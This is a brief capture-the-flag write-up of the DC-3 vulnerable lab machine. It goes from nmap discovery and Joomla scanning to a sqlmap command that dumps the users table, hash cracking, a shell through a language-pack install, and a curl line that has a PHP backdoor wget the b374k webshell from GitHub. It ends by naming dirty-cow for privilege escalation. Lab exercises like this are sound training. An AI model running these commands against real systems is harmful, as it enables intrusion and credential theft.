you can download it here: http://www.five86.com/downloads/DC-3.zip

use nmap to discover the target:
nmap -Pn 192.168.227.0/24

1

check port 80

2

use whatweb to scan the website

3

it is using joomla, try joomlavs
ruby joomlavs.rb –url http://192.168.227.138/ -a

4

it is vulnerable to sql which will leads to rce

5

tried msf, but failed because adminstrator is not logged in.
switch to sqlmap,
sqlmap -u “http://192.168.227.138/index.php/fr/?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D joomladb -T “#__users” -C username,password,email –dump -p “list[fullordering]” –dbms=mysql –technique E

6

7

use john to decrypt the hash and login as admin to website, install the language pack to get shell

8

9

10

11

tried using nc and bash to get a reverse shell but failed, download a webshell first;
curl http://192.168.227.138/language/af-ZA/test.php?test=system(%27wget%20https://raw.githubusercontent.com/tennc/webshell/master/php/b374k/b374k-3.2.3.php%27);

12

13

stucked for a while, tried suid, sudo, sensitive files, nothing.
try some exploit on os system, uname -a && lsb_release -a

14

ubuntu 16.04, quite old, dirty-cow should work

15

16